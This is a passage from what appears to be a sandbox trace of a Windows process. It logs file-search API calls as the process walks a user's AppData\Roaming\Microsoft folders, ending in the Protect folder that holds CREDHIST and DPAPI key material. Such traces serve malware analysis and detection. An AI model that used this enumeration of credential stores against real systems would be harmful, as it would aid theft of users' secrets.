dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6936d0 [0266.778] FindNextFileW (in: hFindFile=0x6936d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa92f1c4e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x31c6a486, ftLastAccessTime.dwHighDateTime=0x1d7b063, ftLastWriteTime.dwLowDateTime=0x934f7bb4, ftLastWriteTime.dwHighDateTime=0x1d7b063, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0266.778] FindNextFileW (in: hFindFile=0x6936d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x934f7bb4, ftCreationTime.dwHighDateTime=0x1d7b063, ftLastAccessTime.dwLowDateTime=0x934f7bb4, ftLastAccessTime.dwHighDateTime=0x1d7b063, ftLastWriteTime.dwLowDateTime=0x934f7bb4, ftLastWriteTime.dwHighDateTime=0x1d7b063, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="XLSTART", cAlternateFileName="")) returned 1 [0266.778] FindNextFileW (in: hFindFile=0x6936d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x934f7bb4, ftCreationTime.dwHighDateTime=0x1d7b063, ftLastAccessTime.dwLowDateTime=0x934f7bb4, ftLastAccessTime.dwHighDateTime=0x1d7b063, ftLastWriteTime.dwLowDateTime=0x934f7bb4, ftLastWriteTime.dwHighDateTime=0x1d7b063, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="XLSTART", cAlternateFileName="")) returned 0 [0266.778] FindClose (in: hFindFile=0x6936d0 | out: hFindFile=0x6936d0) returned 1 [0266.778] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0266.778] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0266.778] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Excel\\.", nBufferLength=0x105, lpBuffer=0x19ebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Excel", lpFilePart=0x0) returned 0x35 [0266.778] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer", nBufferLength=0x105, lpBuffer=0x19ec5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer", lpFilePart=0x0) returned 0x41 [0266.779] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0266.779] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer", nBufferLength=0x105, lpBuffer=0x19ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer", lpFilePart=0x0) returned 0x41 [0266.779] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", nBufferLength=0x105, lpBuffer=0x19ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpFilePart=0x0) returned 0x42 [0266.779] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\internet explorer\\*"), lpFindFileData=0x19ee4c | out: lpFindFileData=0x19ee4c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6934d0 [0266.779] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0266.779] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6654de95, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x6654de95, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Quick Launch", cAlternateFileName="QUICKL~1")) returned 1 [0266.780] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UserData", cAlternateFileName="")) returned 1 [0266.780] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UserData", cAlternateFileName="")) returned 0 [0266.781] FindClose (in: hFindFile=0x6934d0 | out: hFindFile=0x6934d0) returned 1 [0266.781] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0266.781] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0266.781] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer\\.", nBufferLength=0x105, lpBuffer=0x19ebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Internet Explorer", lpFilePart=0x0) returned 0x41 [0266.781] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\MMC", nBufferLength=0x105, lpBuffer=0x19ec5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\MMC", lpFilePart=0x0) returned 0x33 [0266.781] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0266.781] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\MMC", nBufferLength=0x105, lpBuffer=0x19ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\MMC", lpFilePart=0x0) returned 0x33 [0266.781] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\MMC\\", nBufferLength=0x105, lpBuffer=0x19ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\MMC\\", lpFilePart=0x0) returned 0x34 [0266.781] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\MMC\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\mmc\\*"), lpFindFileData=0x19ee4c | out: lpFindFileData=0x19ee4c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3704a98f, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x3704a98f, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x3704a98f, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6935d0 [0266.787] FindNextFileW (in: hFindFile=0x6935d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3704a98f, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x3704a98f, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x3704a98f, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0266.787] FindNextFileW (in: hFindFile=0x6935d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3704a98f, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x3704a98f, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x3704a98f, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0266.787] FindClose (in: hFindFile=0x6935d0 | out: hFindFile=0x6935d0) returned 1 [0266.788] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0266.788] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0266.788] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\MMC\\.", nBufferLength=0x105, lpBuffer=0x19ebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\MMC", lpFilePart=0x0) returned 0x33 [0266.788] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network", nBufferLength=0x105, lpBuffer=0x19ec5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network", lpFilePart=0x0) returned 0x37 [0266.788] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0266.788] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network", nBufferLength=0x105, lpBuffer=0x19ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network", lpFilePart=0x0) returned 0x37 [0266.788] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\", nBufferLength=0x105, lpBuffer=0x19ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\", lpFilePart=0x0) returned 0x38 [0266.788] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\network\\*"), lpFindFileData=0x19ee4c | out: lpFindFileData=0x19ee4c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6934d0 [0266.789] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0266.790] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Connections", cAlternateFileName="CONNEC~1")) returned 1 [0266.790] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Connections", cAlternateFileName="CONNEC~1")) returned 0 [0266.790] FindClose (in: hFindFile=0x6934d0 | out: hFindFile=0x6934d0) returned 1 [0266.790] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0266.790] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0266.790] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network\\.", nBufferLength=0x105, lpBuffer=0x19ebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Network", lpFilePart=0x0) returned 0x37 [0266.790] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office", nBufferLength=0x105, lpBuffer=0x19ec5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office", lpFilePart=0x0) returned 0x36 [0266.790] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0266.791] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office", nBufferLength=0x105, lpBuffer=0x19ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office", lpFilePart=0x0) returned 0x36 [0266.791] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\", nBufferLength=0x105, lpBuffer=0x19ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\", lpFilePart=0x0) returned 0x37 [0266.791] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\office\\*"), lpFindFileData=0x19ee4c | out: lpFindFileData=0x19ee4c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80f7a98f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa45e20df, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa45e20df, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6936d0 [0266.798] FindNextFileW (in: hFindFile=0x6936d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80f7a98f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa45e20df, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa45e20df, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0266.799] FindNextFileW (in: hFindFile=0x6936d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80f81d62, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80f81d62, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80f83167, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x9362, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSO1033.acl", cAlternateFileName="")) returned 1 [0266.799] FindNextFileW (in: hFindFile=0x6936d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa45e20df, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4689310, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa4689310, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0266.799] FindNextFileW (in: hFindFile=0x6936d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa45e20df, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4689310, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa4689310, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 0 [0266.800] FindClose (in: hFindFile=0x6936d0 | out: hFindFile=0x6936d0) returned 1 [0266.800] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0266.800] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0266.800] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office\\.", nBufferLength=0x105, lpBuffer=0x19ebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Office", lpFilePart=0x0) returned 0x36 [0266.800] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook", nBufferLength=0x105, lpBuffer=0x19ec5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook", lpFilePart=0x0) returned 0x37 [0266.800] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0266.800] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook", nBufferLength=0x105, lpBuffer=0x19ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook", lpFilePart=0x0) returned 0x37 [0266.800] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook\\", nBufferLength=0x105, lpBuffer=0x19ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook\\", lpFilePart=0x0) returned 0x38 [0266.800] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\outlook\\*"), lpFindFileData=0x19ee4c | out: lpFindFileData=0x19ee4c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x661c6965, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x661c6965, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x877953e5, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6934d0 [0266.802] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x661c6965, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x661c6965, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x877953e5, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0266.802] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6abbe5b6, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x6abbe5b6, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x6acd6e90, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook.srs", cAlternateFileName="")) returned 1 [0266.802] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x877953e5, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x877953e5, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x87797b5c, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x956, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook.xml", cAlternateFileName="")) returned 1 [0266.803] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0266.803] FindClose (in: hFindFile=0x6934d0 | out: hFindFile=0x6934d0) returned 1 [0266.803] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0266.803] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0266.803] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook\\.", nBufferLength=0x105, lpBuffer=0x19ebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Outlook", lpFilePart=0x0) returned 0x37 [0266.803] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect", nBufferLength=0x105, lpBuffer=0x19ec5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect", lpFilePart=0x0) returned 0x37 [0266.803] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0266.803] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect", nBufferLength=0x105, lpBuffer=0x19ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect", lpFilePart=0x0) returned 0x37 [0266.803] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\", nBufferLength=0x105, lpBuffer=0x19ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\", lpFilePart=0x0) returned 0x38 [0266.803] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Protect\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\protect\\*"), lpFindFileData=0x19ee4c | out: lpFindFileData=0x19ee4c*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x44792966, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x50866c1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x50866c1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x693750 [0266.804] FindNextFileW (in: hFindFile=0x693750, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x44792966, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x50866c1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x50866c1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0266.804] FindNextFileW (in: hFindFile=0x693750, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44792966, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44792966, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xcf68faea, ftLastWriteTime.dwHighDateTime=0x1d85953, nFileSizeHigh=0x0, nFileSizeLow=0x258, dwReserved0=0x0, dwReserved1=0x0, cFileName="CREDHIST", cAlternateFileName="")) returned 1 [0266.804] FindNextFileW (in: hFindFile=0x693750, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x50866c1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x562658a2, ftLastAccessTime.dwHighDateTime=0x1d82a22, ftLastWriteTime.dwLowDateTime=0x562658a2, ftLastWriteTime.dwHighDateTime=0x1d82a22, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-1560258661-3990802383-1811730007-1000", cAlternateFileName="S-1-5-~1")) returned 